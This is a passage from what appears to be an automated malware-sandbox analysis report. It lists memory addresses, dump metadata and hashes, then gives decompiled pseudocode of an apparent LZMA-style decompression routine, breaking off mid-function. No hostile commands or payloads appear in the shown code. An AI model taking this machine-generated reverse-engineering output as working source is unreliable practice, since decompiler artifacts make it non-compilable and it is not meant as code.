                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064ce
                                                                                                                        0x004064d1
                                                                                                                        0x004064d4
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064da
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00406762
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00406819
                                                                                                                        0x00406899
                                                                                                                        0x00406862

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                        • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                                        • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                                        • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
